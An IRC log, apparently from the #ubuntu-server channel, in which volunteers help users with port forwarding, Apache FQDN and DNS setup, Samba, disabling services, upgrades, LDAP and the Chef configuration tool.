<Gargoyle> it's not 100% since your router might be blocking scans
<Gargoyle> want me to check from here?
<Paulr1> sure that may be quicker
<Paulr1> if you don't mind
<Paulr1> 74.232.187.85
<Gargoyle> doesn't look open
<Gargoyle> 25,139,445,593 are showing as open.
<Paulr1> hmmm
<Paulr1> Not sure why 25 would be open
<Gargoyle> well, they show as filtered, not open
<Paulr1> Okay.. thanks...  not sure where to go from here...
<Gargoyle> I'm not that great with nmap, I just use it for basic port testing when I can't run a netstat on the local machine
<Gargoyle> where did you enter the rule?
<Paulr1> the rule?
<Gargoyle> On your router?
<Gargoyle> Under port forwarding or application rules?
<Paulr1> They have an option for " virtual servers" ...  I also tried port forwarding
<Paulr1> Virtual Servers just automates the port and type of traffic
<Gargoyle> so under virtual servers you had port 80 in both boxes, and 192.168.0.200 for the IP address, and always for schedule and allow all for inbound filter?
<Gargoyle> and protocol as tcp?
<Paulr1> yes
<Paulr1> So as far as ubuntu is concerned, if I can see the static page from http://localhost/ and I have the correct port in /etc/ports.conf then all should be fine?
<Gargoyle> Paulr1: try http://192.168.0.200/ just incase
<Paulr1> That works fine internally
<Gargoyle> localhost = 127.0.0.1 which is the loopback interface. That doesn't mean it is actually working on the network for real
<Paulr1> I can access the page from any internal computer
<Paulr1> with the ip
<Gargoyle> then, unless I am forgetting something obvious, that should be OK
<Paulr1> The router shows the IP router IP address as 192.168.0.3 - I also see the web page when I enter that
<Paulr1> I guess I'm back to a router issue then
<Paulr1> baaaa humbug
<Gargoyle> you see your apache web page on 192.168.0.3 also?
<Paulr1> Yep - dlink does some translation... it shows that as my IP address (instead of the 74.232.187.85)
<Gargoyle> strange!
<Paulr1> Almost sounds like the isp does have me blocked
<Gargoyle> I just tested mine using a standard apache install on 8.04
<Gargoyle> http://mediaserver.homelinux.org/
<Paulr1> Well your's definitely does work
<Paulr1> I've been at this for 2 days now lol
<Gargoyle> So, out of the box - there is nothing ubuntu should be doing to throw a spanner in the works!
<Paulr1> okay
<Paulr1> Well I have't configured iptables or anything...
<Paulr1> fresh install yesterday
<Paulr1> I tried port 8080 earlier.. that didn't help...
<Gargoyle> Looks like you are gonna have to google and see if anyone else has had issues...
<Paulr1> yep
<Paulr1> Well you've helped me a lot anyway.. I really appreciate it
<Gargoyle> no worries
<Paulr1> Have a nice weekend!
<Gargoyle> cheers. and you
<ScottK> sommer: New clamav (0.94) that doesn't build with php-clamavlib.
<ScottK> sommer: I've put clamav in the team PPA if you want to see what's up and (please) fix it again.
<ythe1300> Hi all
<ythe1300> I was wondering if anyone could point me in the proper direction, of how to make a Ubuntu webserver support server side VB-scripting
<ythe1300> if that is possible
<NCommander> ythe1300, if your talking ASP, there is a module for Apache to sorta have classic ASP support, but its slow, and generally speaking, if you need server side VB/ASP, you should be staying with Windows and IIS
<hads> Or changing scripting solutions :)
<ythe1300> #NCommander ah I was not wanting to stay with windows but I don't know any PHP and my JAVA almost useless right now
<ythe1300> so I think that I may have to start learning
<ythe1300> because I want to throw server 2008 off a large building right now
<ythe1300> :
<ythe1300> :(
<ythe1300> Are there any good guides that you would suggest, or any languages to start off with?
<ythe1300> Thankyou in advance
<NCommander> ythe1300, what are you trying to do?
<ythe1300> My friends and I are trying to build a website, but we know little about web development, so we where trying to stick with things that we knew, ( VB, HTML, and VS.net)
<NCommander> Well, VB is deperiated by Microsoft
<ythe1300> but we are so angry about win 2008 server not doing anything that it says it's doing.
<ythe1300> not to mention the updates, restarting the server without asking.
<ythe1300> that we are ready to ditch all MS products
<ythe1300> #NCommander: Yes but I was hoping that there would be some kind of translator ( or something) that would give us a chance to convert what we had already done.
<ythe1300> I guess I don't really know what I want. I am really new to this.
<ythe1300> I don't know if this will help,
<ythe1300> but we are looking to create a site that will need a login, (kind of forum style)
<ythe1300> and just for little apps that we want to create on the site
<ythe1300> also we want to be able to remote login from outside the-network
<ythe1300> NCommander, thank you for the help,  Hopefully I will be able to figure that out. :)
<ythe1300> (off to read forums ttfn)
<chmac> When I edit virtual hosts files using vim, some show syntax highlighting, some don't. Any suggestions what the difference is?
<chmac> I don't have file installed on the sever so `file blah` doesn't work...
<Kamping_Kaiser> what sort of virtual hosts files? and where are they located?
<mitan> hello, is there a way to setup root access for samba, that is, a super-user access that can access entire / ?
<mitan> i tried creating "root" account with smbpasswd -a root ...
<mitan> but it still won't access
<mitan> and i don't have invalid users = root in smb.conf anymore
<jon_high9000> hello. i am a newbie and have just setup my Ubuntu Server this morning. if i make a mistake is there any to erase it?
<jon_high9000> My apologies i found the site you mentioned for discussions.
<jon_high9000> thanks again.
<NDRMRC> hi all i chat from italy, i am a system administrator on a big company, but i admin windows system and aix system
<NDRMRC> i hope that this channel help me in the administration of linux system, tks all
<erik78se> Anyone with some experience in aimk in here ? I'm about to try to build sun grid engine for ubuntu....
<erik78se> Living in GMT isnt't easy
 * delcoyote hi
<HedgeH0g> Is sendmail installed on ubuntu-server by default
<HedgeH0g> +?
<jpds> We use postfix for mail servers.
<jpds> \o/ Drive-by support requests.
<lamont> jpds: those are the best kind, no?
<ScottK> Heya lamont.
<ScottK> lamont: Did you see my ping the other day about my new master.cf scripts not making it into the .deb?
<lamont> dpkg --contents postfix_2.5.5-1_i386.deb | grep add
<lamont> -rwxr-xr-x root/root      4999 2008-09-03 08:28 ./usr/sbin/postfix-add-filter
<lamont> -rwxr-xr-x root/root      3906 2008-09-03 08:28 ./usr/sbin/postfix-add-policy
<lamont> say again/
<lamont> ?
<lamont> now, the manpages?  that's a bug
<lamont> which is fixed in -2
<lamont> I think
<lamont> iz committed in anycase
<ScottK> lamont: OK.  I must have been tired when I looked.  Thanks.
<ScottK> Sorry about that.
<lamont> well, manpages showed up when I went looking, since I really expected _4_ lines of output...
<lamont> and afk.  bbl
<g3gg0> hi, maybe someone has an idea:   have a rootserver, i dont want to reboot. its running 2.6.16.13-4-xen (without PAE support).  is there a chance to get a recent kernel running, which has automatic PAE detection?
<g3gg0> i always end up with "Bad file descriptor" when adding the VM
<g3gg0> tried to boot with vmlinuz-2.6.24-19-xen
<w8tah> hi folks -- can someone please suggest a good piece of VPN Software that is a) easy to configure, b) has good cookbook docs for me to set it up on my hardy gateway, and c) would allow me to vpn in from either windows or linux?
<w8tah> im having connection issues -- if i posted this already im sorry
<AlexGC> good evening gentlemen
<w8tah> Looking for a good VPN program that will a) work well on my hardy gateway, b) has good cookbook documentation , and C) will allow me to connect from windows or linux
<AlexGC> Q: I just finished a 6.06 server install.  Is there a default root pass? or did I miss it on install? I can't reboot the server or loginto it with root.
<Ian_Corne> default, there is no root password
<Ian_Corne> iirc
<Ian_Corne> sudo su and passwd it
<Ian_Corne> or put a live-cd in, chroot to it, and passwd it then :)
<AlexGC> ahh got it !  thanks Ian_Corne
<Ian_Corne> np :)
<AlexGC> I appreciate it.
<J_5> i have this: 'getty[8474]: tty1: input overrun" in /var/log/auth.log....can someone tell me what this is?
<Ian_Corne> hmm
<Ian_Corne> my first _guess_ would be some1 tried to login with a very long username/password? :p
<J_5> someone trying to hack my box I guess? I have tons of the same entrs all from today
<Ian_Corne> yeah maybe, i don't know
<Ian_Corne> but they clearly failed :)
<J_5> losers. i'll just turn off SSH for a while, they usually move on after a while
<J_5> there is nothing on my box even worth hacking :P
<Ian_Corne> :)
<J_5> weird, i am still getting the same message.  once a min. or so
<hads> Bulk scans on ssh port are standard.
<hads> Use something like fail2ban if you're worried about it
<Ian_Corne> J_5 firewall them out?
<J_5> yeah, i use denyhosts. i get several hits a day. i have just never seen this message
<J_5> it doesn't show an ip or anything, just the message : getty[8512]: tty1: input overrun
<J_5> the number changed though
<J_5> what exactly is getty?
<J_5> ha, hm oops. seems as if there was something laying on the keyboard at the box it's self, hitting all kinds of keys :)
<Ian_Corne> haha
<Ian_Corne> good one :p
<J_5> this is what i get for cleaning. i was cleaning out some stuff and placed in on the keyboard
<Ian_Corne> hehe
<hads> :)
#ubuntu-server 2009-08-31
<Tom_Ass> slap: I guess you can use NM to edit a static connection too
<slap> That's what I did. But I wanted to set up a static DNS. And after reboot, the /etc/resolv.conf is reset ?
<Tom_Ass> slap: hmm, that's kind of my experiences too, but now I just use dynamic... :(
<slap> I wanted a primary nameserver to look at (my server at home), then the second (my ISP)
<Tom_Ass> Hint Auto created connections are not editable. Modifying them without changing names will not be saved
<Tom_Ass> does that help you, slap?
<slap> Hum, it looks like there's another interface that use DHCP (eth1). I think it reset the resolv.conf. I'll check that...
<qman__> I pit a script in /etc/dhcp3/dhclient-exit-hooks.d/ to modify my resolv.conf after it's regenerated
<qman__> put*
<qman__> so I can make use of the dynamic information while still ensuring the correct order and search domains for my local DNS
<roxy09> i there somebody know if ubuntu 9.04 support hotswap hard drives?
<ball> hello MunkyJunky
<MunkyJunky> Hey again ball
<MunkyJunky> Right everyone - my server just seemed like it got attacked (I'm thinking DDoS). Which logs do i look at to find out what happened?
<roxy09> Hi there somebody know if ubuntu 9.04 support hotswap hard drives and double processor?
<ball> roxy09: I don't see why it wouldn't.
<jmarsden> MunkyJunky: Why are you "thinking DDoS"?  What specifically are the symptoms of the issue you are dealing with?  Did you already have a network auditing tool such as argus in place before this happened?
<roxy09> well i am purchasing HP but they dont give me warranty that it work with ubuntu, so i would like to know if somebody have experience
<roxy09> with this kind of servers
<nick125> Does it work with any Linux distro? If so, then it's likely (but not 100%) that it'll work with Ubuntu.
<ball> roxy09: ML110 ?
<MunkyJunky> jmarsden: I don't run the security of the server, the guy who does is sleeping. I'm just trying to learn a bit atm. All websites hosted on the server were inaccessible, and the server was inaccessible except for ssh
<jmarsden> MunkyJunky: Is the httpd running? :)
<jmarsden> That does not sound like a DDoS to me.
<MunkyJunky> Well, I was going on that by what a friend sugested. All I know is the server wen't pretty kaput, and id like to find out what happened sooner rather than later
<jmarsden> Don't guess.  Is httpd running, yes or no?
<MunkyJunky> yes it is
<ball> MunkyJunky: wake up your server geek.
<MunkyJunky> I can't, ball. I have no way of reaching him right now :(
<ball> He doesn't sleep with a pager under his pillow?
<MunkyJunky> Sadly no
<ball> I wish pagers were cheaper here.
<MunkyJunky> I wish Jam was awake to guide me :/
<jmarsden> MunkyJunky: A cellphone would work too :)    Is the server running normally now (you said "was" in your problem description)?  if it is, leave it alone until your guy wakes up.
<MunkyJunky> Yea, I rebooted it and its working fine
<jmarsden> Then your work is done, wait for your server guru.
<MunkyJunky> I thought id end up having to leave it, im just trying to learn a bit about where i should be looking to see what went wrong
<jmarsden> It's hard to say where to look, and rebooting may have destroyed some of the evidence anyway... but since a DDoS is extremely unlikely to end exactly at the moment you happened to reboot the server, chances are high that your diagnosis was incorrect.  You can look in all the httpd logs and in /var/log/messages if you want to do some boring reading :)
<MunkyJunky> haha ty
<MunkyJunky> I'll have a poke about, and I _might_ earn something
<roxy09> hi, sorry about the delay it is a DL360 and DL185 G6
<ball> roxy09: Nice machines.
<roxy09> thanks :)
<imchrislabeard> Hey guys, I've been working on this for awhile and it works and then it stops working... A subdomain that is
<Guest35625> hi i have absolutely no idea how to use ubuntu server. i want to turn my old laptop into a server. can anyone point me in the right direction to learn how to do that?
<qman__> Guest35625, first you need to decide what you want to use it for
<PhotoJim> Guest35625: decide what you want to do with it... and then do some googling to see what the packages are that will do that.
<Guest35625> okay, so.
<PhotoJim> Guest35625: e.g. if you want to do file sharing... you might want NFS for sharing with Linux/BSD machines, and Samba for windows machines.
<PhotoJim> Guest35625: if you want it to be a mail server... you might want to use postfix or exim or sendmail.
<qman__> he probably doesn't want to use sendmail
<Guest35625> i don't know what my options are. i definitely want to use it for sharing files, especially torrents, but also things that could be downloaded from websites.
<PhotoJim> qman__: he could.  I agree he wouldn't want to :)
<qman__> Guest35625, those are jobs for a desktop, not a server
<qman__> for torrents, you might look into torrentflux
<Guest35625> ugh
<Guest35625> i'm so sorry but
<Guest35625> what really is the difference between a desktop and a server
<qman__> the pieces of software you install
<qman__> server does not have a GUI
<qman__> so browsing websites and downloading files is not for a server
<qman__> storing files is a server job
<Guest35625> right, for sure
<qman__> torrentflux is a website that downloads torrents for you
<qman__> so you access it from your desktop
<qman__> I'm not sure if that's what you want, so read up on it
<qman__> servers do things for clients, they provide functions that would be inconvenient on a client machine, and functions that require 24/7 operation, where you would not want your client running
<qman__> they provide centralization for other types of functions like mail and file storage
<Guest35625> right
<qman__> they provide services like DHCP and DNS, and can be routers
<qman__> and host web sites
<qman__> laptops are suited to a particular type of home server, ones that don't need a lot of disk space but need uptime and battery-backup
<qman__> such as a print server
<qman__> laptops generally have small hard drives, so they're not good for file servers
<qman__> and generally can't handle high CPU applications, due to heat
<Guest35625> oh
<Guest35625> well
<Guest35625> i'm kinda learning, and its what i got
<qman__> well, what you should do
<Guest35625> and really the biggest need right now is to up my ratio on a private tracker
<qman__> is instead of setting out to install "a server", you should first figure out what functions you need
<PhotoJim> an older desktop would make a better 24/7 server than a laptop
<Guest35625> thats why i'm here :)
<PhotoJim> but frankly you just need a desktop you can leave on 24/7
<qman__> seeding torrents can be done on a server, but that's not really the type of thing you get a server for
<qman__> unless you need a setup like torrentflux, to create user accounts and manage an entire network's torrents together on one machine
<Guest35625> hmmm interesting
<Guest35625> so are you saying i'd do better to install ubuntu desktop on my laptop, leave it on 24/7 and seed?
<qman__> probably not, because laptops aren't designed to run 24/7
<qman__> if you do that, make sure you take precautions for extra cooling
<Guest35625> but i'm a student with no money and this old laptop
<Guest35625> will do
<PhotoJim> what you want to do is kind of like running a dirt-hauling business with a hatchback :)
<PhotoJim> you can do it but it will kind of suck :)
<PhotoJim> you don't need a good desktop.
<PhotoJim> my server was a Pentium II for years.
<PhotoJim> right now it's a Pentium III.
<qman__> if you're going to do it, I suggest standing it up slightly open, like an A shape
<qman__> and if it runs particularly hot, get a fan
<PhotoJim> if you run it on a server distribution you don't need a GUI.
<Guest35625> what does that mean
<qman__> you should choose the operating system based on the role
<PhotoJim> I'm saying that I have two jobs and I have money and I have a server that cost $50.
<qman__> if you want to run something like torrentflux, server is appropriate, but if you just want to run a GUI torrent client, desktop is better
<PhotoJim> and you could probably get someone to give you a Pentium III system for nothing.
<Guest35625> ah i gotcha
<PhotoJim> so being a student isn't an issue.
<PhotoJim> you don't need a Core 2 Quad to run a home server.
<qman__> my shell server is a 200MHz K6
<Guest35625> well i mean
<qman__> I probably couldn't give it away
<Guest35625> i just want to get started with a server
<PhotoJim> a Pentium II or III won't be fast, but it will do fine for what you want.  and it will be cheap.
<Guest35625> its like what i did with linux
<Guest35625> i was like
<Guest35625> TODAY I WILL LEARN LINUX
<Guest35625> and i did
<qman__> to "get started with a server"
<PhotoJim> my first Linux machine was a 486sx25 :)
<qman__> you have to first start with a role to fill
<Guest35625> im no pro, but i can work my way through it competently
<PhotoJim> I still have it.  it still runs.  I just don't do anything useful with it anymore. :)
<Guest35625> lol
<PhotoJim> get the best machine you can get for free or cheap.  disk space and RAM are more important than CPU speed.
<PhotoJim> I had 400 GB of disk space in my PII server.  it was fine.
<PhotoJim> the only reason I upgraded was because I fell into an opportunity.
<qman__> yes
<qman__> you choose the hardware based on the role as well
<qman__> a file server, a slow CPU is fine
<PhotoJim> it ran my file server and web server and DNS and it barely worked.
<PhotoJim> it was fine with 256 MB of RAM, but I maxed it out to 768 when I had the chance and a few bucks.
<qman__> 256 is plenty for that grade of machine
<qman__> my shell server can only hold 256, it's maxed out
<qman__> the main problem with that machine
<qman__> it's only i586
<qman__> so I can't use i686 kernels
<PhotoJim> not that that's a huge issue
<qman__> no, just annoying
<qman__> I once installed gentoo on that
<qman__> took three weeks
<PhotoJim> compile a custom kernel :) that way you'll have optimized performance.
<qman__> I did a stage 2 with the 2004 release
<qman__> back when they still supported that
<qman__> it was a great learning experience
<qman__> gentoo is too much hassle for the real world, though
<qman__> ubuntu gets it done, and quick
<Guest35625> okay
<Guest35625> what if i want to run a web cms like dnn
<qman__> a web cam?
<qman__> oh
<qman__> cms
<qman__> you will first need a web server stack
<qman__> you can do LAMP, or go with something more lightweight like nginx or lighttpd
<qman__> that depends on the needs of the web software you choose and your personal preferences
<jmarsden> qman__: Do you know what dnn stands for in the context of CMSes?  if not, why are you advising Guest35625  about it?
<qman__> I don't know what dnn is, but I know plenty of other CMSes
<jmarsden> DNN is DotNetNuke which uses the .Net framework...
<Guest35625> lol
<qman__> oh
<Guest35625> which means no lamp
<qman__> that means no linux
<qman__> unless it somehow works on mono?
<qman__> but I wouldn't advise that even if it does work
<Guest35625> okay
<Guest35625> so i should install 8.10 desktop 64 on my lappy
<Guest35625> then use a web gui for torrents or a remote desktop connection?
<qman__> well
<Guest35625> to manage the computer
<qman__> you should not install 8.10
<jmarsden> Why 8.10?  9.04 exists...
<qman__> you should install 8.04 or 9.04
<Guest35625> jk 9.04
<Guest35625> i forgot what today was
<Guest35625> :)
<qman__> also, when you said old laptop, I assumed older than that
<Guest35625> no, its just not my new laptop
<Guest35625> my old laptop is running a T5200 intel core duo
<Guest35625> which i think is 1.6
<qman__> I have a PII thinkpad as a print server
<Guest35625> 2 gb ram, 120 gb hard drive
<Guest35625> some gosu gpu that i'll never use D:
<Guest35625> but run 9.04 64 bit desktop and use remote desktop to access it?
<Guest35625> would be more advantageous to me than a server?
<qman__> you couldn't use remote desktop, since that's a windows thing
<qman__> but you could use VNC or XDMCP
<Guest35625> i thought ubuntu had a built in remote login
<qman__> it does, VNC and XDMCP
<qman__> but that's different from Remote Desktop, which is a windows software
<Guest35625> sorry
<Guest35625> could i still use my lappy to host a file and access it through its ip address?
<simplexio> or run ubuntu-desktop in vbox to in win machine to acces remote desktop to server like i do, i get native  win for games (HOI3) and real production desktop on same computer
<jmarsden> Ahem... Ubuntu includes an RDP client called rdesktop, but no RDP server component.  But all of this discussion of graphical UIs is off topic for #ubuntu-server.
<qman__> yes, it is
<Guest35625> well, could i still use my laptop to host a file and access it throug the ip address on ubuntu desktop? or is that a server only thing?
<qman__> yes, you can install samba on a desktop
<Guest35625> good stuff
<simplexio> Guest35625: yeah. samba/nfs and all other file server thingies still can be installed
<Guest35625> any ideas for getting started with servers?
<Guest35625> forreal, server talk is sexy
<Guest35625> you take a girl out for dinner and you tell her all about how big your SQL server is and they get all hawt
<qman__> like I've said before, you have to come up with a task or purpose first
<Guest35625> i don't have one, but certainly its possible to learn about something without needing it quite yet
<Guest35625> in programming you program the euclidean algorithm to calculate primes--as if you're ever going to use that...
<qman__> system administration and programming are two very different fields
<qman__> even if you're not in a production environment, you still need to decide on a task to perform
<Guest35625> so what kinds of tasks are good for beginniners? charge me with one
<qman__> we've gone through plenty already
<qman__> mail, file servers, web servers
<Guest35625> but which is the one i've been charged with?
<qman__> DNS, DHCP
<Guest35625> whats a web server, exactly?
<qman__> a server which hosts a website or web application
<qman__> you could do something like oscommerce or phpbb
<Guest35625> interesting
<Guest35625> thats a really cool idea
<Guest35625> thanks for the info
<imchrislabeard> Hey guys i'm not sure what i did but when i restart apache i get this message - http://pastebin.org/13577
<Auckla> Hi.
<Auckla> I just installed Ubunutu server to try it out. I was hopeing for some kind've graphical interface like Redhat or something. Ehehe. I come form a BSD enviroment. Is there somewhere other then, " https://help.ubuntu.com/9.04/serverguide/C/index.html " <--- Hear to start with?
<qman__> ubuntu server does not include a GUI, since it is generally considered a security risk on servers
<qman__> if you want a GUI, look into ubuntu desktop
<qman__> imchrislabeard, that message means apache couldn't determine the FQDN of the server, a DNS issue
<imchrislabeard> qman__: ahh okay so thats located somewhere in the hosts directory
<qman__> apache is a little more picky, it won't just take the system hostname
<imchrislabeard> what do i need to make it my systems name is longhornpc the primary domain is longhornpcrepair.com
<qman__> it wants an FQDN
<imchrislabeard> oo okay ... does the server need to have a primary domain just for it
<qman__> well
<qman__> your FQDN in that case is longhornpc.longhornpcrepair.com
<qman__> so, in /etc/hosts
<qman__> you should have something like
<qman__> 127.0.0.1 localhost
<qman__> 12.34.56.78 longhornpc longhornpc.longhornpcrepair.com
<qman__> where 12.34.56.78 is your listening IP address
<imchrislabeard> well the way i have it set up right now is server is http://longhornpc pointing at the /home directory and then longhornpcrepair.com is home/longhornpc
<qman__> this doesn't have to do with the sites themselves
<qman__> this is a systemwide configuration
<imchrislabeard> oh alright well it seems like all this happend once i tried to set up my RNDC key
<qman__> for each domain name you're listening on, it must resolve to an IP for the system, and the quickest way is to add it to /etc/hosts
<qman__> the other way is to set up full DNS
<qman__> which it looks like you did, and it broke
<imchrislabeard> yeah i have a dns set up on this server
<qman__> well, if it's broken
<qman__> I would back up your zone file and remove bind with the --purge option to clear the config
<qman__> and then reinstall bind
<imchrislabeard> well all of my domains are working fine it seems but my subdomain will work for a little while in then stop working
<imchrislabeard> but i just get that warning from apache .. so i was kinda curious what was goin on
<qman__> yeah, that just means there's a DNS problem
<qman__> and apache can't determine the FQDN of the system
<Auckla> I am sorry, I have ran bsd for so long, I was lookng for something I could be lazy about hear for the local network. Excuse me if that sounds offending.
<Auckla> hear, here. Poor me another screwdriver. :P Hah! :P
<qman__> Auckla, I'm not sure what you mean, but the Ubuntu Server Guide is the best place to start off in building a new server
<qman__> you can skip the parts not relevant to your application, of course
<Auckla> Ag, I'm horrible length wireless hear at my new house, and I guess I am going to have to download another cd at 150k\s a second.
<imchrislabeard> qman__: alright so you said earlier the FQDN would be longhornpc.longhornpcrepair.com
<Auckla> God I keep mispelling that word. :P
<qman__> imchrislabeard, yes
<imchrislabeard> qman__: would i add this to my named.conf ?
<Auckla> I would like to install x on this system, so I could then install synergy.
<qman__> Auckla, you would only need ubuntu desktop if you want a GUI, though that won't help much in setting up a server, since there aren't any GUI server apps
<Auckla> If anyone is framiliar with that.
<qman__> imchrislabeard, no
<Auckla> Gah, I just care about php,mysql and apache. :)
<qman__> imchrislabeard, you just need to make the system resolve that name to your IP in some way, either by adding it to your zone file, or adding it to /etc/hosts
<qman__> Auckla, then you want LAMP
<Auckla> I installed it, but where is my gui to boot? :P
<qman__> Auckla, there is none
<Auckla> I have seen a lot of linux distros. Hehe, not use to one being real I guess.
<qman__> Auckla, you can install a GUI package, but that's not supported in this channel
<qman__> since ubuntu server is designed to be used console only
<Auckla> Hehe, thank you for your conversation.
<imchrislabeard> qman__: alright so in "longhornpcrepair.com.hosts" i would add longhornpc.longhornpcrepair.com and give it the public ip or the internal ip...
<Auckla> Word, dig it. I got it np. :D
<qman__> if all you want is remote administration, install ssh
<imchrislabeard> qman__: sorry if im asking too many questions
<qman__> imchrislabeard, I don't know what that file is, is that your DNS zone file?
<qman__> that name should point to whatever IP apache is listening on
<qman__> be it public or internal
<imchrislabeard> qman__: i have a zone file for each domain... and my dns server is on the longhorn
<qman__> that naming is confusing
<qman__> a DNS zone file and a hosts file are completely different
<qman__> zone files contain records formatted a certain way
<qman__> but in any case
<qman__> if you are doing this in DNS, the zone for longhornpcrepair.com should contain an A record pointing longhornpc.longhornpcrepair.com to whichever IP that apache server is listening on
<cef> qman__: afaik, he's using webmin, which does uses that sort of silly convention
<cef> err does use even.. damn brain
<qman__> hah
<cef> been a long day. :/
<qman__> been there :)
<imchrislabeard> i was using webmin but i have been creating the dns hosts files without using webmin
<imchrislabeard> i like having them separate
<imchrislabeard> yeah well it looks like my FQDN is "longhornpc" which isn't qualified so i need to just change that
<imchrislabeard> why is that the only web panel that is supported for ubuntu is the worst one ?
<acalvo> anyone know if profile acls samba directive works with xp sp3?
<acalvo> hi
<acalvo> I'm trying to manage all my network printers using CUPS in a SAMBA server, so I'm looking for a good tutorial that covers this area
<acalvo> I've looked in the ubuntu community and didn't find anything useful
<clusty> how can I prevent a service from ever starting?
<clusty> somehow avahi found it's way into my sys :D
<sub> clusty: I forget the exact usage, but update-rc.d should do what you need it to do
<clusty> sub, thanks
<sub> update-rc.d -f remove avahi-daemon perhaps
<slacker_nl> i would just chmod -x the init.d script
<giovani> slacker_nl: that's not a proper solution
<slacker_nl> giovani: you are right, just remove the rc?.d/[SK] scripts
<slacker_nl> but, when you want them again, you need ro recreate the rc?.d symlinks, and chmod +x is easier
<PhotoJim> slacker_nl: I tend to just rename scripts I don't want to run.  that way it's obvious why they're not working.  -x isn't obvious.
<sub> slacker_nl, PhotoJim - update-rc.d handles creating and removing of the symlinks and is used by debian packaging
<bunny> ow do i make an extended partition from the partitioner in the installer?
<slacker_nl> sub: i know, but if you also maintain solaris boxes, you want a way which is the same on all platforms
<VirtualDisaster> slacker_nl, there is no "universal" way except to write a wrapper around the native tools
<VirtualDisaster> especially w/ solaris....
<clusty> hey
<clusty> what tool would you suggest to automate system configuration?
<clusty> currently i am looking at puoppet and maybe cfengine
<aubre> some people say chef is good , I don't know much about it personally
<clusty> aubre, looks quite complicated to setup
<aubre> clusty: yeah
<jtimberman> clusty: Chef :-)
 * jtimberman works for the company that wrote Chef.
<jtimberman> Pop into #chef if you have any questions.
<clusty> :D
<clusty> lool
<jtimberman> I also packaged Chef for Ubuntu Karmic :)
<clusty> jtimberman, bad idea divulging that
<jtimberman> Why?
<jtimberman> Its not a secret.
<clusty> now if i decide to go for chef you will be machine gunned with questions
<clusty> :D
<jtimberman> yeah but thats my job.
<aubre> I'm looking forward to finishing up my UEC install, just can't work on it at the moment
<clusty> jtimberman, chef feels a very big gun for what i need. basically we got a new computational cluster: 20 machines conected over the network. I want to keep the conf across these machines homogenous
<jtimberman> clusty: you don't need the server part of chef, you can run just solo mode.
<clusty> jtimberman, so how does it work then: not like configure 1 machine and use some framework to propagate the confs ?
<jtimberman> clusty: no, each client is an autonomous unit. the client is 'fat'. it gets the configuration (cookbooks with recipes) from a server (client/server mode), or from a remote url or a local directory (solo mode). then the client / solo parses the recipes and takes the actions appropriate.
<clusty> jtimberman, i see. so is good enough to mount the same file over NFS and just edit the file
<clusty> file=cookbook/recipes
<clusty> ..gotta love the depths to which the analogy was pushed D:
<jtimberman> clusty: that's certainly possible. chef-solo supports retrieving from a URL, a la "chef-solo -r http://opsmaster.int.example.com/cookbooks.tar.gz"
<jtimberman> but you could use a directory mounted via NFS instead if thats your preference.
<jtimberman> clusty: and yes, the cooking metaphor is highly abused :)
<jtimberman> with shoutout to Chef from South Park, The Swedish Chef from the Muppets, and the Lego Chef minifigs.
<clusty> that is one thing that makes linux much more full of flavour
<clusty> all the g33ky inside jokes
<clusty> i guess 50% of a project success comes from it's funky name/icon
<clusty> logo
<genii> Recursive acronyms, etc
<jtimberman> don't forget chef's data gathering counterpart, ohai.
<jtimberman> 'ohai, here's some json about your system'
<clusty> guess the joke needs to be explained :D
<clusty> what is the funny part of ohai ?
<clusty> some lolcatz spelling?
<uvirtbot> New bug: #418220 in php5 (main) "apache2 crashed with SIGSEGV in pdo_parse_params()" [Undecided,New] https://launchpad.net/bugs/418220
<jtimberman> yup
<jtimberman> so, geeky inside joke :)
<clusty> yeap
<clusty> jtimberman, guess chef wins :D
<clusty> not as scary as it seemed in the beginning
<jtimberman> clusty: It really isn't. The big thing is lots of dependencies.
<jtimberman> and with Karmic, you can apt-get install chef and have a functional chef client, or chef-server to get a functional server.
<jtimberman> and we're working on backporting to other ubuntu releases back to hardy.
<clusty> jtimberman, what about the stable one?
<jtimberman> jaunty?
<clusty> yes
<giovani> slacker_nl: no, that's what update-rc.d is for
<jtimberman> karmic packages "should" work there, but there aren't backport packages yet.
<clusty> jtimberman, a wee bit of a turn off. will try to see how annoying is it to get it working from repo
<clusty> jtimberman, i saw examples to synch conf files. how can I synch list of installed packages?
<jtimberman> clusty: sure, join #chef if you have any further questions.
<jtimberman> clusty: you can manage packages individually, so if you start from the same base image, you'd have whatever packages installed from chef's recipes that you told it to install. (plus dependencies of those when using apt)
<clusty> got a small question about updating a PC: it is running ubuntu 8.04
<clusty> should update in one go to 9.04 or pass through each intermediate version? 8.04->8.10->9.04 ?
<ScottK> clusty: Yes.
<ScottK> Each intermediate version
<clusty> ScottK, how likely is it to break stuff ?
<clusty> so far I have postgres DNS DHCP and LDAP running on that machine
<clusty> ppl will scream if that goes down for a long time :D
<ScottK> clusty: running lvm or softraid?
<clusty> ScottK, nope. hardware raid
<ScottK> They'll scream less that if it goes down long enough for you to reinstall the box.
<ScottK> BTW, mostly services stay up during the upgrade.
<ScottK> Most of the outage would be for the reboot.
<clusty> ScottK, added twist: machine is in germany and i am in canada :D
<heath|work> Is there a way to tell kvm to unplug a network cable on a virt?
<clusty> there are some half way savvy ppl there
<bobg> I want to build a LDAP server for my company. Is ubuntu a decent OS to use for this? Does it have any apps (in the standard repo) to help manage users? Is there much difference between hardy and jaunty in support as an LDAP server?
<Sam-I-Am> you'd really want the openldap packages from karmic
<Sam-I-Am> if possible
<Sam-I-Am> but otherwise, ubuntu is finwe
<clusty> bobg, it's as good as any other one
<clusty> Sam-I-Am, i just set up ldap user auth with hardy ldap
<Sam-I-Am> clusty: ok?
 * bobg is googling karmic 
<Sam-I-Am> (its the next release)
<bobg> oh
<Sam-I-Am> or... you can run hardy and use my backports.
<Sam-I-Am> which contain most of the fixes since hardy's packages
<bobg> so there have been a lot of work done recently on it?
<Sam-I-Am> LTS releases are good for servers
<clusty> Sam-I-Am, the actual ldap was hard part
<clusty> the user auth went very smooth
<Sam-I-Am> well, hardy is technically from 04/08... so 1.5 years ago or so.
<clusty> took me forever to figure out how to import datas and stuff like that
<Sam-I-Am> openldap moves quickly, often faster than ubuntu
<bobg> Sam-I-Am: I was trying to stay LTS, but I find if a load up a hardy xen VM it crashes with a "stuck cpu" so I have been migrating to jaunty if a vm experiences that
<Sam-I-Am> i havent used xen, but hardy seems fine under vmware and vbox
<Sam-I-Am> you could search for bug reports on that... see if theres a fix... if not, try to get a bug report going
<bobg> Sam-I-Am: is it the actual openldap that I want a later version of, or is it support  packages that modify the schema or provide tools to manage users?
<clusty> Sam-I-Am, so ther eis a high likelihood that updating from 8.04 to 9.04 smething will break?
<clusty> as far as ldap goes
<Sam-I-Am> clusty: configuration as a client is roughly the same
